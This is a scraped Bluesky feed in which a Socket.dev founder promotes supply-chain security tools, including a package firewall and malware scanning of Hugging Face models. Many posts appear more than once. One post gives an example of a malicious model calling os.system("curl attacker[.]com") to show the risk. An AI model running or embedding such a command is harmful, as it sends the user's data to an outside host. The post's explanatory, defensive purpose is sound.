Feross
@feross.bsky.social
🧙♂️ Mad scientist • ✨ Founder + CEO @Socket.dev (http://socket.dev) •🌲 Stanford lecturer (http://cs253.stanford.edu) • ❤️ Open source at WebTorrent + StandardJS
Today, we’re launching Socket Firewall Enterprise — built to stop malicious packages before they ever reach your apps or developer systems.
October 24, 2025 at 3:56 PM
Today, we’re launching Socket Firewall Enterprise — built to stop malicious packages before they ever reach your apps or developer systems.
You’d never clone a random repo and give it your production keys… But that’s literally what your GitHub Actions do every time they run.
Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.
Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.
October 23, 2025 at 8:24 PM
You’d never clone a random repo and give it your production keys… But that’s literally what your GitHub Actions do every time they run.
Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.
Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.
1️⃣ Static analysis (SAST) for 14 languages — finds real code issues like command injection or unsafe deserialization before they land.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
October 21, 2025 at 7:00 PM
1️⃣ Static analysis (SAST) for 14 languages — finds real code issues like command injection or unsafe deserialization before they land.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
4️⃣
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
October 20, 2025 at 4:21 PM
4️⃣
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
3️⃣
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
October 20, 2025 at 4:21 PM
3️⃣
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
2️⃣
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
October 20, 2025 at 4:21 PM
2️⃣
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
🚨 Open source supply chain attacks are exploding.
Starting today, that ends.
We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.
Just run:
npm i -g sfw
sfw npm install lodash
Works for: npm, yarn, pnpm, pip, uv, and cargo.
Starting today, that ends.
We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.
Just run:
npm i -g sfw
sfw npm install lodash
Works for: npm, yarn, pnpm, pip, uv, and cargo.
September 30, 2025 at 6:06 PM
🚨 Open source supply chain attacks are exploding.
Starting today, that ends.
We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.
Just run:
npm i -g sfw
sfw npm install lodash
Works for: npm, yarn, pnpm, pip, uv, and cargo.
Starting today, that ends.
We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.
Just run:
npm i -g sfw
sfw npm install lodash
Works for: npm, yarn, pnpm, pip, uv, and cargo.
DJ Khaled on compromised NPM packages
September 18, 2025 at 2:51 PM
DJ Khaled on compromised NPM packages
3️⃣ It’s all live in the UI 🖱️ and the API 🧪
So whether you’re a clicker or a scripter 🧑💻 — you’re covered.
This is a public beta 🚧 Available NOW ⏰
Tell us what you love — and what’s broken 🛠️
So whether you’re a clicker or a scripter 🧑💻 — you’re covered.
This is a public beta 🚧 Available NOW ⏰
Tell us what you love — and what’s broken 🛠️
April 22, 2025 at 7:15 PM
3️⃣ It’s all live in the UI 🖱️ and the API 🧪
So whether you’re a clicker or a scripter 🧑💻 — you’re covered.
This is a public beta 🚧 Available NOW ⏰
Tell us what you love — and what’s broken 🛠️
So whether you’re a clicker or a scripter 🧑💻 — you’re covered.
This is a public beta 🚧 Available NOW ⏰
Tell us what you love — and what’s broken 🛠️
1️⃣ You can now tag your repos with custom labels:
• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥
Whatever fits your mental model 🧠.
Finally, a sane way to bring order to repo chaos.
• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥
Whatever fits your mental model 🧠.
Finally, a sane way to bring order to repo chaos.
April 22, 2025 at 7:15 PM
1️⃣ You can now tag your repos with custom labels:
• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥
Whatever fits your mental model 🧠.
Finally, a sane way to bring order to repo chaos.
• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥
Whatever fits your mental model 🧠.
Finally, a sane way to bring order to repo chaos.